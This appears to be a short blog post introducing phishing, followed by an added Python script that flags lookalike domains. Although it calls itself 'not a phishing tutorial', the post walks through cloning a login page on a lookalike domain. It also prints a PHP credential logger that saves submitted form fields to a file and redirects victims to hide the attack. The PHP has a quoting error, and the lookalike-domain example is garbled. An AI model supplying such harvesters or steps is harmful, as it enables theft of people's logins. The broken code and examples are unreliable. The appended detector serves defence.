What Is Phishing
In this post we will discuss a little about what phishing is. Please note that what we are covering here is just the basics and not a phishing tutorial. In a phishing attack, an attacker creates a fake login page of a legitimate website and lures the victim into logging in through it. The site under attack is known as the phished site, and the fake login page used for capturing or stealing information is known as the phished page. To perform a phishing attack, an attacker performs the following steps.
First of all, he gets a free web host and then selects a domain which somehow resembles the site he wants to phish. For example, to hack a Gmail password he/she may select a domain like Gmail. Look carefully: both words appear nearly similar at a glance, and that is where the attacker makes a catch.
Next, he opens the site he wants to phish and saves it on his/her desktop, then uploads those files to his/her own domain. The attacker then creates a web page with a sorry or error message to make the victim believe the site is temporarily down or under maintenance, or he types the following lines in a PHP file and uploads it to his/her domain:
<?php
header ('Location: 'www.realdomainname.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Here he/she replaces the URL shown with a red background by the real URL of the phished page. This file is also uploaded there, so that the victim gets redirected to the original website, to avoid detection of the phishing attack.
Nearly all phishing attacks are conducted in the same way.
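The first step above depends on a domain that passes for the real one at a glance, which is something a defender can check for mechanically. The following is an added example, not part of the original post: it classifies hostnames (for instance from proxy or mail-gateway logs) against a list of protected domains. The `PROTECTED` list, the `CONFUSABLES` table, the `max_dist` threshold and the sample hostnames are assumptions made for illustration.

```python
import unicodedata

PROTECTED = ["gmail.com"]  # assumption: domains your users really log in to
# Assumption: small illustrative table of visual substitutions, not exhaustive.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})

def normalise(host):
    return unicodedata.normalize("NFKC", host).lower().rstrip(".")

def skeleton(host):
    """Collapse common look-alike characters so 'grnai1' and 'gmail' compare equal."""
    return normalise(host).translate(CONFUSABLES).replace("rn", "m").replace("vv", "w")

def edit_distance(a, b):
    """Optimal string alignment distance: a swapped pair of letters costs 1."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            best = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb))
            if prev2 is not None and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                best = min(best, prev2[j - 2] + 1)
            cur.append(best)
        prev2, prev = prev, cur
    return prev[-1]

def classify(host, protected=PROTECTED, max_dist=1):
    """Return (verdict, matched_domain); verdict is legitimate, lookalike or unrelated."""
    h = normalise(host)
    for p in protected:
        if h == p or h.endswith("." + p):
            return ("legitimate", p)
    for p in protected:
        brand = p.split(".")[0]
        if (skeleton(h) == skeleton(p)              # gmai1.com, grnail.com
                or edit_distance(h, p) <= max_dist  # gmial.com, gmaill.com
                or brand in skeleton(h)):           # gmail.com.verify.example
            return ("lookalike", p)
    return ("unrelated", None)

if __name__ == "__main__":
    # Constructed sample hostnames, e.g. pulled from proxy or mail-gateway logs.
    for host in ["accounts.gmail.com", "gmial.com", "grnail.com",
                 "gmail.com.verify-login.example", "example.org"]:
        print(f"{host:35} {classify(host)}")
```

A "lookalike" verdict is a prompt for review rather than proof: a distance threshold of 1 will also flag unrelated domains that happen to sit one letter away from a protected name.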